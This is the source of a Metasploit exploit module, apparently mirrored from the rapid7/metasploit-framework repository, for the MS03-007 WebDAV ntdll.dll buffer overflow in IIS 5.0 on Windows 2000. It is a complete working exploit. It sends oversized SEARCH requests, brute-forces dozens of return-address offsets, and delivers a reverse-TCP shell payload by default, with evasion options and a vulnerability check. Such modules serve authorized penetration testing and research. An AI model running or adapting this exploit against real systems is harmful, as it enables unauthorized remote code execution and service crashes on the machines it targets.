CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',

16
        'Description' => %q{

17
          This exploits a buffer overflow in NTDLL.dll on Windows 2000

18
          through the SEARCH WebDAV method in IIS. This particular

19
          module only works against Windows 2000. It should have a

20
          reasonable chance of success against SP0 to SP3.

21
        },

22
        'Author' => [ 'hdm' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          ['CVE', '2003-0109'],

26
          ['OSVDB', '4467'],

27
          ['BID', '7116'],

28
          ['PACKETSTORM', '30939'],

29
          ['MSB', 'MS03-007']

30
        ],

31
        'Privileged' => false,

32
        'Payload' => {

33
          'Space' => 512,

34
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

35
          'StackAdjustment' => -3500

36
        },

37
        'Platform' => 'win',

38
        'Arch' => [ARCH_X86],

39
        'Targets' => [

40
          [ 'Automatic Brute Force', {} ],

41
        ],

42
        'DefaultOptions' => {

43
          'PAYLOAD' => 'windows/shell/reverse_tcp'

44
        },

45
        'Notes' => {

46
          'Reliability' => [REPEATABLE_SESSION],

47
          'Stability' => [CRASH_SERVICE_DOWN],

48
          'SideEffects' => [IOC_IN_LOGS]

49
        },

50
        'DisclosureDate' => '2003-05-30',

51
        'DefaultTarget' => 0

52
      )

53
    )

54


55
    register_evasion_options(

56
      [

57
        # XXX: We don't have a style for module-local evasion settings yet, so use Advanced's formatting

58
        OptBool.new('InvalidSearchRequest', [false, 'Replace the valid XML search with random data', false]),

59


60
        # XXX - ugh, there has to be a better way to remove entries from an

61
        # enum that overwriting the evalable enum option

62
        OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none', 'hex-normal'], 'none'])

63
      ], self.class

64
    )

65


66
    deregister_options('HTTP::junk_params', 'HTTP::header_folding')

67
  end

68


69
  def autofilter

70
    # Common vulnerability scanning tools report port 445/139

71
    # due to how they test for the vulnerability. Remap this

72
    # back to 80 for automated exploitation

73


74
    rport = datastore['RPORT'].to_i

75
    if (rport == 139 || rport == 445)

76
      datastore['RPORT'] = 80

77
    end

78


79
    true

80
  end

81


82
  def check

83
    # Verify the service is running first

84
    res = send_request_raw({ 'uri' => '/' }, 5)

85
    return CheckCode::Safe('Connection failed') unless res

86


87
    xml = "<?xml version=\"1.0\"?>\r\n"

88
    xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"

89
    xml << "<g:sql>\r\n"

90
    xml << "Select \"DAV:displayname\" from scope()\r\n"

91
    xml << "</g:sql>\r\n"

92
    xml << "</g:searchrequest>\r\n"

93


94
    response = send_request_cgi({

95
      'uri' => "/#{'x' * 65535}",

96
      'ctype' => 'text/xml',

97
      'method' => 'SEARCH',

98
      'data' => xml

99
    }, 5)

100


101
    if response && response.body.to_s.include?('Server Error(exception')

102
      return CheckCode::Vulnerable("We've hit a server error (exception)")

103
    end

104


105
    # Request-URI Too Long

106
    if response && response.code == 414

107
      return CheckCode::Safe("The server returned #{response.code} (#{response.message})")

108
    end

109


110
    # Did the server stop accepting requests?

111
    begin

112
      send_request_raw({ 'uri' => '/' }, 5)

113
    rescue StandardError

114
      return CheckCode::Appears('The server stopped accepting requests') unless res

115
    end

116


117
    CheckCode::Safe

118
  end

119


120
  def exploit

121
    # Verify the service is running first

122
    res = send_request_raw({ 'uri' => '/' }, 5)

123
    fail_with(Failure::Unreachable, 'Connection failed') unless res

124


125
    # Common offsets

126
    common_offsets = [

127
      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)

128
      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

129
      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)

130
      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)

131
      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)

132
      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)

133
    ]

134


135
    # Generic Bruteforce - Windows 2000 Professional

136
    pro_offsets = [

137
      "\x41\xa8", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 FR / SP2 PT)

138
      "\x41\xa9", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)

139
      "\x41\xaa", # Windows 2000 Professional (SP1 EN / SP2 FR / SP2 PT)

140
      "\x41\xab", # Windows 2000 Professional (SP1 AR)

141
      "\x41\xac", # Windows 2000 Professional (SP0 FI)

142
      "\x41\xad", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)

143
      "\x41\xae", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)

144
      "\x41\xaf",

145


146
      "\x41\xb0",

147
      "\x41\xb1", # Windows 2000 Professional (SP0 EN)

148
      "\x41\xb2", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 PT)

149
      "\x41\xb3", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 FR / SP2 PT)

150
      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)

151
      "\x41\xb5", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP2 EN / SP2 FR / SP2 PT)

152
      "\x41\xb6", # Windows 2000 Professional (SP0 NL / SP1 AR / SP2 FR / SP2 PT)

153
      "\x41\xb7", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP1 AR / SP1 CZ / SP2 FR)

154
      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)

155
      "\x41\xb9", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 AR / SP2 FR / SP2 PT)

156
      "\x41\xba", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP2 FR)

157
      "\x41\xbb", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 PT)

158
      "\x41\xbc", # Windows 2000 Professional (SP0 FI / SP1 AR / SP2 FR)

159
      "\x41\xbd", # Windows 2000 Professional (SP0 FI / SP0 TR)

160
      "\x41\xbe", # Windows 2000 Professional (SP0 TR)

161
      "\x41\xbf", # Windows 2000 Professional (SP0 FI)

162
    ]

163


164
    # Generic Bruteforce - Windows 2000 Server

165
    server_offsets = [

166
      "\x4f\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)

167
      "\x4f\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

168
      "\x4f\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

169
      "\x4f\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)

170
      "\x4f\xc4", # Windows 2000 Server (SP2 EN)

171
      "\x4f\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)

172
      "\x4f\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)

173
      "\x4f\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)

174
      "\x4f\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)

175
      "\x4f\xc9", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

176
      "\x4f\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

177
      "\x4f\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP0 TR / SP1 EN / SP2 EN)

178
      "\x4f\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)

179
      "\x4f\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP0 TR)

180
      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

181
      "\x4f\xcf", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 EN / SP2 EN)

182


183
      "\x4f\x40",

184
      "\x4f\x41",

185
      "\x4f\x42", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)

186
      "\x4f\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)

187
      "\x4f\x44",

188
      "\x4f\x45",

189
      "\x4f\x46",

190
      "\x4f\x47", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR)

191
      "\x4f\x48",

192
      "\x4f\x49",

193
      "\x4f\x4a",

194
      "\x4f\x4b",

195
      "\x4f\x4c",

196
      "\x4f\x4d",

197
      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)

198
      "\x4f\x4f",

199


200
      "\x41\x40",

201
      "\x41\x41",

202
      "\x41\x42", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)

203
      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)

204
      "\x41\x44",

205
      "\x41\x45",

206
      "\x41\x46",

207
      "\x41\x47", # Windows 2000 Server (SP0 ES / SP0 HU)

208
      "\x41\x48", # Windows 2000 Server (SP1 SE)

209
      "\x41\x49",

210
      "\x41\x4a",

211
      "\x41\x4b",

212
      "\x41\x4c",

213
      "\x41\x4d",

214
      "\x41\x4e",

215
      "\x41\x4f",

216


217
      "\x41\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)

218
      "\x41\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

219
      "\x41\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

220
      "\x41\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)

221
      "\x41\xc4", # Windows 2000 Server (SP2 EN)

222
      "\x41\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)

223
      "\x41\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)

224
      "\x41\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)

225
      "\x41\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)

226
      "\x41\xc9", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

227
      "\x41\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

228
      "\x41\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)

229
      "\x41\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)

230
      "\x41\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 IT / SP0 HU / SP0 NL / SP0 PT / SP0 TR)

231
      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)

232
      "\x41\xcf", # Windows 2000 Server (SP0 DE / SP0 ES / SP0 NL / SP0 TR / SP1 EN / SP1 SE / SP2 EN)

233
    ]

234


235
    if datastore['InvalidSearchRequest']

236
      xml = rand_text(32..1056)

237
    else

238
      xml = "<?xml version=\"1.0\"?>\r\n"

239
      xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"

240
      xml << "<g:sql>\r\n"

241
      xml << "Select \"DAV:displayname\" from scope()\r\n"

242
      xml << "</g:sql>\r\n"

243
      xml << "</g:searchrequest>\r\n"

244
    end

245


246
    # The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'

247
    # This decodes to "inc ecx"

248
    url = 'A' * (65_516 - payload.encoded.length)

249
    url << payload.encoded

250


251
    offsets = common_offsets.concat(server_offsets).concat(pro_offsets).uniq

252


253
    offsets.each_with_index do |ret, index|

254
      print_status("Trying return address #{format('0x%.8x', Rex::Text.to_unicode(ret).unpack('V*').first)} (#{index + 1} / #{offsets.length})...")

255
      url[283, 2] = ret

256


257
      begin

258
        send_request_cgi({

259
          'uri' => "/#{url}",

260
          'ctype' => 'text/xml',

261
          'method' => 'SEARCH',

262
          'data' => xml

263
        }, 5)

264
      rescue StandardError => e

265
        print_error("Attempt failed: #{e}")

266
      end

267


268
      1.upto(8) do |_i|

269
        select(nil, nil, nil, 0.25)

270
        break if session_created?

271
      end

272


273
      break if session_created?

274


275
      fail_with(Failure::Unreachable, 'Giving up, IIS must have completely crashed') unless service_running?

276
    end

277
  end

278


279
  # Try connecting to the server up to 20 times, with a two second gap

280
  # This gives the server time to recover after a failed exploit attempt

281
  def service_running?

282
    print_status('Checking if IIS is back up after a failed attempt...')

283
    1.upto(20) do |i|

284
      break if session_created?

285


286
      return true if send_request_raw({ 'uri' => '/' }, 5)

287


288
      print_error("Connection failed (#{i} of 20)...")

289
      select(nil, nil, nil, 2)

290
    end

291
    false

292
  end

293
end

294


295